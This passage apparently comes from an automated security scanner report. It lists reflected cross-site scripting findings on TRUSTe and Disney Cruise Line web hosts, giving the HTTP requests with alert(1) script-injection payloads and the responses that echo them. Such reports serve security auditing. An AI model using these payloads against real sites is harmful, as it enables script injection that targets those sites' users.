User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4571

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':300,'height':250f8c30<script>alert(1)</script>184723fc829,'ox':0,'oy':0,'plc':'tr','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.21. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied without encoding into a single-quoted JavaScript string literal in the response's configuration object ('plc':'tr6c2e5<script>...'), served as text/javascript. The payload 6c2e5<script>alert(1)</script>c1db2d67ea7 was submitted in the plc parameter and echoed unmodified.

Since this payload contains no single quote or backslash it stays inside the string literal, so the response shown does not by itself demonstrate script execution. Confirm by submitting a value containing a single quote and a backslash and checking whether they are escaped; if they are not, the string can be terminated and arbitrary JavaScript appended. As with the other /ca parameters, the exposure is on pages that embed this script with attacker-influenced parameters.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250&zi=10002&plc=tr6c2e5<script>alert(1)</script>c1db2d67ea7 HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4512

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':300,'height':250,'ox':0,'oy':0,'plc':'tr6c2e5<script>alert(1)</script>c1db2d67ea7','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.22. http://choices.truste.com/ca [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied without encoding into a JavaScript object literal in the response (served as text/javascript), in an unquoted position that is expected to hold a number ('width':30015459<script>...). The payload 15459<script>alert(1)</script>7675ee448ea was submitted in the w parameter and echoed unmodified, which breaks the syntax of the script.

The script tag is not meaningful in this context; what the reflection shows is that any JavaScript expression supplied in w becomes part of the executed script, since there is neither a numeric check nor any quoting around the value. Exploitation requires the parameter to be attacker-influenced in the script URL of a page that includes it; direct navigation to a text/javascript response only displays it as text.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=30015459<script>alert(1)</script>7675ee448ea&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4571

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':30015459<script>alert(1)</script>7675ee448ea,'height':250,'ox':0,'oy':0,'plc':'tr','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.23. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied without encoding into a single-quoted JavaScript string literal in the response's configuration object ('zindex':'10002c8d63<script>...'), served as text/javascript. The payload c8d63<script>alert(1)</script>12ddf7e69dc was submitted in the zi parameter and echoed unmodified.

Since this payload contains no single quote or backslash it stays inside the string literal, so the response shown does not by itself demonstrate script execution. Confirm by submitting a value containing a single quote and a backslash and checking whether they are escaped; if they are not, the string can be terminated and arbitrary JavaScript appended. A z-index is also a number, so the value should never have needed to be echoed as free text at all.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250&zi=10002c8d63<script>alert(1)</script>12ddf7e69dc&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4512

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att01','pid':'mec01','zindex':'10002c8d63<script>alert(1)</script>12ddf7e69dc','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

5.24. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae3c"><script>alert(1)</script>10a0dd7f9ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaeae3c"><script>alert(1)</script>10a0dd7f9ea/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png?t=1285273951103 HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:08 GMT
Content-Length: 33412
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediaeae3c"><script>alert(1)</script>10a0dd7f9ea/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png" />
...[SNIP]...

5.25. http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6b3"><script>alert(1)</script>2d4a37d68e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media3b6b3"><script>alert(1)</script>2d4a37d68e9/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:15 GMT
Content-Length: 32976
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media3b6b3"><script>alert(1)</script>2d4a37d68e9/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico" />
...[SNIP]...

5.26. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bc0d"><script>alert(1)</script>d4674076468 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3bc0d"><script>alert(1)</script>d4674076468/concat/2.39.0.9/css?files=/nonGlobal/pleaseWait.css HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:32 GMT
Content-Length: 102688
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/3bc0d"><script>alert(1)</script>d4674076468/concat/2.39.0.9/css" />
...[SNIP]...

5.27. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e4d"><script>alert(1)</script>38a959cfdd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f8e4d"><script>alert(1)</script>38a959cfdd4/concat/2.39.0.9/js?files=/dewey/2.5.1/build/yui/selector/selector-beta-min.js,/dewey/2.5.1/build/yui/datasource/datasource-min.js,/dewey/2.5.1/build/yui/container/container-min.js,/dewey/2.5.1/build/yui/menu/menu-min.js,/dewey/2.5.1/build/yui/autocomplete/autocomplete-min.js,/dewey/2.5.1/build/yui/json/json-min.js,/dewey/2.5.1/build/yui/logger/logger-min.js,/dewey/2.5.1/build/yui/tabview/tabview-min.js,/dewey/2.5.1/build/yui/history/history-min.js,/dewey/2.5.1/build/yui/slider/slider-min.js,/global/stringUtils.js,/global/validators.js,/global/formUtils.js,/global/codeRegistry.js,/global/tools.js,/_lib/buttons/buttons.js,/_lib/analytics/analytics.js,/global/effects/effects.js,/global/async/errors.js,/global/async/pollingConnection.js,/global/async/ajaxRequest.js,/global/async/pleaseWait.js,/global/forms/abandonForms.js,/global/forms/formValidator.js,/global/forms/fieldValidations.js,/global/partyMixHandler.js,/global/animation/animation.js,/global/animation/sequencer.js,/global/categoryChangeHandler.js,/global/swfobject.js,/_lib/analytics/omniture/s_code.js,/_lib/tools/testAndTarget/mbox.js HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:36:11 GMT
Content-Length: 102687
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/f8e4d"><script>alert(1)</script>38a959cfdd4/concat/2.39.0.9/js" />
...[SNIP]...

5.28. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [&qqElement parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of the &qqElement request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed5b1'%3balert(1)//e077333c670 was submitted in the &qqElement parameter. This input was echoed as ed5b1';alert(1)//e077333c670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuoteed5b1'%3balert(1)//e077333c670&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: Close
Content-Length: 194169
Content-Type: text/javascript; charset=iso-8859-1
Pragma: cache
Server: barista/3.3.5
Cache-Control: max-age=1200
Expires: Mon, 16 May 2011 01:44:43 GMT
Date: Mon, 16 May 2011 01:24:43 GMT
Connection: close

/*<script>*/
/*
* This module purposely does not bog the client down with null continuous checks due to initial checks.
* No client-side JavaScript should be modifying the HTML QQ DOM, unless you wa
...[SNIP]...
ange the event function to include a safe zone
                                       // for the calendar button image as well
       'qqCalendars': Array(),            // array of all available calendar objects
       'qqElement': 'DisneyQuickQuoteed5b1';alert(1)//e077333c670',    // the qq container element ID, as a string
       'qqTravelMinLength': Array(),    // array of integers for minimum travel length; ID matches the calendar it
                                       // interfaces with, e.g. qqTravelMinL
...[SNIP]...

5.29. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6089a"><script>alert(1)</script>4b7e2c4925d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6089a"><script>alert(1)</script>4b7e2c4925d/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:22 GMT
Content-Length: 102620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/6089a"><script>alert(1)</script>4b7e2c4925d/en_US/htmlQQ/jsQuickQuote" />
...[SNIP]...

5.30. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30002<script>alert(1)</script>5fbba82f226 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services30002<script>alert(1)</script>5fbba82f226/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services30002<script>alert(1)</script>5fbba82f226/en_US/htmlQQ/jsQuickQuote</BODY></HTML>

5.31. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61d5d<script>alert(1)</script>9f047ac3d3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /services/en_US61d5d<script>alert(1)</script>9f047ac3d3a/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 162
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:27 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/en_US61d5d<script>alert(1)</script>9f047ac3d3a/htmlQQ/jsQuickQuote</BODY></HTML>

5.32. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b72b1<script>alert(1)</script>958bd4aec04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/en_US/htmlQQb72b1<script>alert(1)</script>958bd4aec04/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:33 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/htmlQQb72b1<script>alert(1)</script>958bd4aec04/jsQuickQuote</BODY></HTML>

5.33. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5943d<script>alert(1)</script>ffb20f66d15 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/en_US/htmlQQ/jsQuickQuote5943d<script>alert(1)</script>ffb20f66d15?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:37 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/htmlQQ/jsQuickQuote5943d<script>alert(1)</script>ffb20f66d15</BODY></HTML>

5.34. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9cd"><script>alert(1)</script>170eaf02e31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /concatac9cd"><script>alert(1)</script>170eaf02e31/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:15 GMT
Content-Length: 102613
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/concatac9cd"><script>alert(1)</script>170eaf02e31/4.39.1.5/css" />
...[SNIP]...

5.35. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6ad"><script>alert(1)</script>4d3fe98385e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
